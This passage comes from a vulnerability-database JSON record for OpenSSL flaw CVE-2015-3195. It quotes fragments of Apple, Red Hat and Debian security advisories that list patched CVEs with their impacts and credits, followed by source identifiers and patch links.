Team\n\nAppleRAID\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local user may be able to determine kernel memory layout\nDescription: An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1732 : Proteas of Qihoo 360 Nirvan Team\n\nAppleUSBNetworking\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue existed in the parsing of\ndata from USB devices. This issue was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1734 : Andrea Barisani and Andrej Rosano of Inverse Path\n\nBluetooth\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1735 : Jeonghoon Shin@A.D.D\nCVE-2016-1736 : beist and ABH of BoB\n\nCarbon\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .dfont file may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nhandling of font files. These issues were addressed through improved\nbounds checking. \nCVE-ID\nCVE-2016-1737 : an anonymous researcher\n\ndyld\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An attacker may tamper with code-signed applications to\nexecute arbitrary code in the application\u0027s context\nDescription: A code signing verification issue existed in dyld. This\nissue was addressed with improved validation. \nCVE-ID\nCVE-2016-1738 : beist and ABH of BoB\n\nFontParser\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Opening a maliciously crafted PDF file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with\nTrend Micro\u0027s Zero Day Initiative (ZDI)\n\nHTTPProtocol\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple vulnerabilities existed in nghttp2 versions\nprior to 1.6.0, the most serious of which may have led to remote code\nexecution. These were addressed by updating nghttp2 to version 1.6.0. \nCVE-ID\nCVE-2015-8659\n\nIntel Graphics Driver\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1743 : Piotr Bania of Cisco Talos\nCVE-2016-1744 : Ian Beer of Google Project Zero\n\nIOFireWireFamily\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local user may be able to cause a denial of service\nDescription: A null pointer dereference was addressed through\nimproved validation. \nCVE-ID\nCVE-2016-1745 : sweetchip of Grayhash\n\nIOGraphics\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1746 : Peter Pi of Trend Micro working with Trend Micro\u0027s\nZero Day Initiative (ZDI)\nCVE-2016-1747 : Juwei Lin of Trend Micro working with Trend Micro\u0027s\nZero Day Initiative (ZDI)\n\nIOHIDFamily\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to determine kernel memory layout\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1748 : Brandon Azad\n\nIOUSBFamily\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1749 : Ian Beer of Google Project Zero and Juwei Lin of\nTrend Micro working with Trend Micro\u0027s Zero Day Initiative (ZDI)\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A use after free issue was addressed through improved\nmemory management. \nCVE-ID\nCVE-2016-1750 : CESG\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A race condition existed during the creation of new\nprocesses. This was addressed through improved state handling. \nCVE-ID\nCVE-2016-1757 : Ian Beer of Google Project Zero and Pedro Vilaca\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1756 : Lufeng Li of Qihoo 360 Vulcan Team\n\nKernel\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team\nCVE-2016-1755 : Ian Beer of Google Project Zero\nCVE-2016-1759 : lokihardt\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to determine kernel memory layout\nDescription: An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1758 : Brandon Azad\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple integer overflows were addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro\u0027s Zero\nDay Initiative (ZDI)\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to cause a denial of service\nDescription: A denial of service issue was addressed through\nimproved validation. \nCVE-ID\nCVE-2016-1752 : CESG\n\nlibxml2\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Processing maliciously crafted XML may lead to unexpected\napplication termination or arbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2015-1819\nCVE-2015-5312 : David Drysdale of Google\nCVE-2015-7499\nCVE-2015-7500 : Kostya Serebryany of Google\nCVE-2015-7942 : Kostya Serebryany of Google\nCVE-2015-8035 : gustavo.grieco\nCVE-2015-8242 : Hugh Davenport\nCVE-2016-1761 : wol0xff working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\nCVE-2016-1762\n\nMessages\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An attacker who is able to bypass Apple\u0027s certificate\npinning, intercept TLS connections, inject messages, and record\nencrypted attachment-type messages may be able to read attachments\nDescription: A cryptographic issue was addressed by rejecting\nduplicate messages on the client. \nCVE-ID\nCVE-2016-1788 : Christina Garman, Matthew Green, Gabriel Kaptchuk,\nIan Miers, and Michael Rushanan of Johns Hopkins University\n\nMessages\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Clicking a JavaScript link can reveal sensitive user\ninformation\nDescription: An issue existed in the processing of JavaScript links. \nThis issue was addressed through improved content security policy\nchecks. \nCVE-ID\nCVE-2016-1764 : Matthew Bryan of the Uber Security Team (formerly of\nBishop Fox), Joe DeMesy and Shubham Shah of Bishop Fox\n\nNVIDIA Graphics Drivers\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1741 : Ian Beer of Google Project Zero\n\nOpenSSH\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Connecting to a server may leak sensitive user information,\nsuch as a client\u0027s private keys\nDescription: Roaming, which was on by default in the OpenSSH client,\nexposed an information leak and a buffer overflow. These issues were\naddressed by disabling roaming in the client. \nCVE-ID\nCVE-2016-0777 : Qualys\nCVE-2016-0778 : Qualys\n\nOpenSSH\nAvailable for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5\nImpact: Multiple vulnerabilities in LibreSSL\nDescription: Multiple vulnerabilities existed in LibreSSL versions\nprior to 2.1.8. These were addressed by updating LibreSSL to version\n2.1.8. \nCVE-ID\nCVE-2015-5333 : Qualys\nCVE-2015-5334 : Qualys\n\nOpenSSL\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A remote attacker may be able to cause a denial of service\nDescription: A memory leak existed in OpenSSL versions prior to\n0.9.8zh. This issue was addressed by updating OpenSSL to version\n0.9.8zh. \nCVE-ID\nCVE-2015-3195\n\nPython\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription: Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by updating libpng to version\n1.6.20. \nCVE-ID\nCVE-2014-9495\nCVE-2015-0973\nCVE-2015-8126 : Adam Mari\u0161\nCVE-2015-8472 : Adam Mari\u0161\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted FlashPix Bitmap Image may\nlead to unexpected application termination or arbitrary code\nexecution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1767 : Francis Provencher from COSIG\nCVE-2016-1768 : Francis Provencher from COSIG\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted Photoshop document may lead\nto unexpected application termination or arbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1769 : Francis Provencher from COSIG\n\nReminders\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Clicking a tel link can make a call without prompting the\nuser\nDescription: A user was not prompted before invoking a call. This\nwas addressed through improved entitlement checks. \nCVE-ID\nCVE-2016-1770 : Guillaume Ross of Rapid7 and Laurent Chouinard of\nLaurent.ca\n\nRuby\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local attacker may be able to cause unexpected application\ntermination or arbitrary code execution\nDescription: An unsafe tainted string usage vulnerability existed in\nversions prior to 2.0.0-p648. This issue was addressed by updating to\nversion 2.0.0-p648. \nCVE-ID\nCVE-2015-7551\n\nSecurity\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local user may be able to check for the existence of\narbitrary files\nDescription: A permissions issue existed in code signing tools. This\nwas addressed though additional ownership checks. \nCVE-ID\nCVE-2016-1773 : Mark Mentovai of Google Inc. \n\nSecurity\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted certificate may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the ASN.1 decoder. \nThis issue was addressed through improved input validation. \nCVE-ID\nCVE-2016-1950 : Francis Gabriel of Quarkslab\n\nTcl\nAvailable for: \nOS X Yosemite v10.10.5 and OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription: Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by removing libpng. \nCVE-ID\nCVE-2015-8126 : Adam Mari\u0161\n\nTrueTypeScaler\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2016-1775 : 0x1byte working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\n\nWi-Fi\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An attacker with a privileged network position may be able\nto execute arbitrary code\nDescription: A frame validation and memory corruption issue existed\nfor a given ethertype. This issue was addressed through additional\nethertype validation and improved memory handling. \nCVE-ID\nCVE-2016-0801 : an anonymous researcher\nCVE-2016-0802 : an anonymous researcher\n\nOS X El Capitan 10.11.4 includes the security content of Safari 9.1. \nhttps://support.apple.com/kb/HT206171\n\nOS X El Capitan v10.11.4 and Security Update 2016-002 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - https://gpgtools.org\n\niQIcBAEBCgAGBQJW8JQFAAoJEBcWfLTuOo7tZSYP/1bHFA1qemkD37uu7nYpk/q6\nARVsPgME1I1+5tOxX0TQJgzMBmdQsKYdsTiLpDk5HTuv+dAMsFfasaUItGk8Sz1w\nHiYjSfVsxL+Pjz3vK8/4/fsi2lX6472MElRw8gudITOhXtniGcKo/vuA5dB+vM3l\nJy1NLHHhZ6BD2t0bBmlz41mZMG3AMxal2wfqE+5LkjUwASzcvC/3B1sh7Fntwyau\n/71vIgMQ5AaETdgQJAuQivxPyTlFduBRgLjqvPiB9eSK4Ctu5t/hErFIrP2NiDCi\nUhfZC48XbiRjJfkUsUD/5TIKnI+jkZxOnch9ny32dw2kUIkbIAbqufTkzsMXOpng\nO+rI93Ni7nfzgI3EkI2bq+C+arOoRiveWuJvc3SMPD5RQHo4NCQVs0ekQJKNHF78\njuPnY29n8WMjwLS6Zfm+bH+n8ELIXrmmEscRztK2efa9S7vJe+AgIxx7JE/f8OHF\ni9K7UQBXFXcpMjXi1aTby/IUnpL5Ny4NVwYwIhctj0Mf6wTH7uf/FMWYIQOXcIfP\nIzo+GXxNeLd4H2ypZ+UpkZg/Sn2mtCd88wLc96+owlZPBlSqWl3X1wTlp8i5FP2X\nqlQ7RcTHJDv8jPT/MOfzxEK1n/azp45ahHA0o6nohUdxlA7PLci9vPiJxqKPo/0q\nVZmOKa8qMxB1L/JmdCqy\n=mZR+\n-----END PGP SIGNATURE-----\n. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). (CVE-2014-8176,\nCVE-2015-0209, CVE-2015-0286, CVE-2015-3194, CVE-2015-3195, CVE-2015-3196,\nCVE-2015-3216, CVE-2016-0702, CVE-2016-0705, CVE-2016-0797, CVE-2016-0799,\nCVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-2108, CVE-2016-2109,\nCVE-2016-2177, CVE-2016-2178, CVE-2016-2842)\n\n* This update fixes several flaws in libxml2. (CVE-2016-1762,\nCVE-2016-1833, CVE-2016-1834, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837,\nCVE-2016-1838, CVE-2016-1839, CVE-2016-1840, CVE-2016-3627, CVE-2016-3705,\nCVE-2016-4447, CVE-2016-4448, CVE-2016-4449, CVE-2016-4483)\n\n* This update fixes three flaws in curl. (CVE-2016-5419, CVE-2016-5420,\nCVE-2016-7141)\n\n* This update fixes two flaws in httpd. (CVE-2014-3523, CVE-2015-3185)\n\n* This update fixes two flaws in mod_cluster. (CVE-2016-4459,\nCVE-2016-8612)\n\n* A buffer overflow flaw when concatenating virtual host names and URIs was\nfixed in mod_jk. (CVE-2016-6808)\n\n* A memory leak flaw was fixed in expat. \n\nAfter installing the updated packages, the httpd daemon will be restarted\nautomatically. JIRA issues fixed (https://issues.jboss.org/):\n\nJBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0]\nJBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service\n\n6. 5 client) - i386, x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. The Common Vulnerabilities and Exposures project\nidentifies the following issues:\n\nCVE-2015-3194\n\n Loic Jonas Etienne of Qnective AG discovered that the signature\n verification routines will crash with a NULL pointer dereference if\n presented with an ASN.1 signature using the RSA PSS algorithm and\n absent mask generation function parameter. A remote attacker can\n exploit this flaw to crash any certificate verification operation\n and mount a denial of service attack. \n\nCVE-2015-3196\n\n A race condition flaw in the handling of PSK identify hints was\n discovered, potentially leading to a double free of the identify\n hint data. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 1.0.1e-2+deb7u18. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1.0.1k-3+deb8u2. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.0.2e-1 or earlier", "sources": [ { "db": "NVD", "id": "CVE-2015-3195" }, { "db": "JVNDB", "id": "JVNDB-2015-006116" }, { "db": "CNVD", "id": "CNVD-2015-07950" }, { "db": "VULHUB", "id": "VHN-81156" }, { "db": "VULMON", "id": "CVE-2015-3195" }, { "db": "PACKETSTORM", "id": "141239" }, { "db": "PACKETSTORM", "id": "137292" }, { "db": "PACKETSTORM", "id": "139114" }, { "db": "PACKETSTORM", "id": "136346" }, { "db": "PACKETSTORM", "id": "139116" }, { "db": "PACKETSTORM", "id": "140182" }, { "db": "PACKETSTORM", "id": "134783" }, { "db": "PACKETSTORM", "id": "134632" } ], "trust": 3.06 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-3195", "trust": 4.0 }, { "db": "BID", "id": "91787", "trust": 1.8 }, { "db": "BID", "id": "78626", "trust": 1.8 }, { "db": "JUNIPER", "id": "JSA10733", "trust": 1.8 }, { "db": "JUNIPER", "id": "JSA10761", "trust": 1.8 }, { "db": "JUNIPER", "id": "JSA10759", "trust": 1.8 }, { "db": "SECTRACK", "id": "1034294", "trust": 1.8 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.8 }, { "db": "PULSESECURE", "id": "SA40100", "trust": 1.8 }, { "db": "JVN", "id": "JVNVU95113540", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU97668313", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2015-006116", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201512-075", "trust": 0.7 }, { "db": "CNVD", "id": "CNVD-2015-07950", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "PACKETSTORM", "id": "134783", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-81156", "trust": 0.1 }, { "db": "ICS CERT", "id": "ICSA-22-349-21", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2015-3195", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "141239", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137292", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "139114", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136346", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "139116", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "140182", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134632", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2015-07950" }, { "db": "VULHUB", "id": "VHN-81156" }, { "db": "VULMON", "id": "CVE-2015-3195" }, { "db": "JVNDB", "id": "JVNDB-2015-006116" }, { "db": "PACKETSTORM", "id": "141239" }, { "db": "PACKETSTORM", "id": "137292" }, { "db": "PACKETSTORM", "id": "139114" }, { "db": "PACKETSTORM", "id": "136346" }, { "db": "PACKETSTORM", "id": "139116" }, { "db": "PACKETSTORM", "id": "140182" }, { "db": "PACKETSTORM", "id": "134783" }, { "db": "PACKETSTORM", "id": "134632" }, { "db": "CNNVD", "id": "CNNVD-201512-075" }, { "db": "NVD", "id": "CVE-2015-3195" } ] }, "id": "VAR-201512-0484", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-81156" } ], "trust": 0.01 }, "last_update_date": "2024-07-23T20:40:42.235000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "APPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update 2016-002", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2016/mar/msg00004.html" }, { "title": "HT206167", "trust": 0.8, "url": "https://support.apple.com/en-us/ht206167" }, { "title": "HT206167", "trust": 0.8, "url": "https://support.apple.com/ja-jp/ht206167" }, { "title": "HPSBMU03590", "trust": 0.8, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05131085" }, { "title": "HPSBMU03611", "trust": 0.8, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05150888" }, { "title": "HPSBMU03612", "trust": 0.8, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05158380" }, { "title": "Release Strategy", "trust": 0.8, "url": "https://www.openssl.org/policies/releasestrat.html" }, { "title": "OpenSSL 1.0.2 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.2-notes.html" }, { "title": "OpenSSL 1.0.1 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.1-notes.html" }, { "title": "OpenSSL 1.0.0 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.0-notes.html" }, { "title": "OpenSSL 0.9.8 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-0.9.8-notes.html" }, { "title": "Fix leak with ASN.1 combine.", "trust": 0.8, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=cc598f321fbac9c04da5766243ed55d55948637d" }, { "title": "X509_ATTRIBUTE memory leak (CVE-2015-3195)", "trust": 0.8, "url": "http://openssl.org/news/secadv/20151203.txt" }, { "title": "Oracle Critical Patch Update Advisory - April 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html" }, { "title": "Oracle Critical Patch Update CVSS V2 Risk Matrices - April 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2016-2881694.html" }, { "title": "Oracle Critical Patch Update Advisory - January 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html" }, { "title": "Text Form of Oracle Critical Patch Update - April 2016 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2016verbose-2881709.html" }, { "title": "Oracle Critical Patch Update Advisory - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "title": "Text Form of Oracle Critical Patch Update - January 2016 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016verbose-2367956.html" }, { "title": "Text Form of Oracle Critical Patch Update - October 2016 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016verbose-2881725.html" }, { "title": "Oracle Critical Patch Update Advisory - July 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "title": "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html" }, { "title": "Oracle Solaris Third Party Bulletin - January 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html" }, { "title": "Oracle Linux Bulletin - October 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html" }, { "title": "Oracle VM Server for x86 Bulletin - July 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html" }, { "title": "April 2016 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/april_2016_critical_patch_update" }, { "title": "January 2016 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/january_2016_critical_patch_update" }, { "title": "October 2016 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/october_2016_critical_patch_update" }, { "title": "July 2016 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update" }, { "title": "TLSA-2015-20", "trust": 0.8, "url": "http://www.turbolinux.co.jp/security/2015/tlsa-2015-20j.html" }, { "title": "Patch for OpenSSL X509_ATTRIBUTE Structure Information Disclosure Vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchinfo/show/67698" }, { "title": "OpenSSL ASN1_TFLG_COMBINE Security vulnerabilities", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=58937" }, { "title": "Red Hat: Moderate: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152616 - security advisory" }, { "title": "Red Hat: Moderate: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152617 - security advisory" }, { "title": "Red Hat: CVE-2015-3195", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-3195" }, { "title": "Debian Security Advisories: DSA-3413-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=82bedc073c0f22b408ebaf092ed8621c" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2830-1" }, { "title": "Amazon Linux AMI: ALAS-2015-614", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-614" }, { "title": "Tenable Security Advisories: [R7] OpenSSL \u002720151203\u0027 Advisory Affects Tenable SecurityCenter", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-01" }, { "title": "Cisco: Multiple Vulnerabilities in OpenSSL (December 2015) Affecting Cisco Products", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20151204-openssl" }, { "title": "Forcepoint Security Advisories: CVE-2015-3194, 3195, 3196 -- Security Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=forcepoint_security_advisories\u0026qid=62ab21cc073446940abce12c35db3049" }, { "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP 2.4.23 Release", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162957 - security advisory" }, { "title": "Symantec Security Advisories: SA105 : OpenSSL Vulnerabilities 3-Dec-2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=a924415f718a299b2d1e8046890941f3" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=435ed9abc2fb1e74ce2a69605a01e326" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - January 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=eb439566c9130adc92d21bc093204cf8" }, { "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=6c15273f6bf4a785175f27073b98a1ce" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=143b3fb255063c81571469eaa3cf0a87" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=e2a7f287e9acc8c64ab3df71130bc64d" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=2f446a7e1ea263c0c3a365776c6713f2" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=122319027ae43d6d626710f1b1bb1d43" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=63802a6c83b107c4e6e0c7f9241a66a8" }, { "title": "", "trust": 0.1, "url": 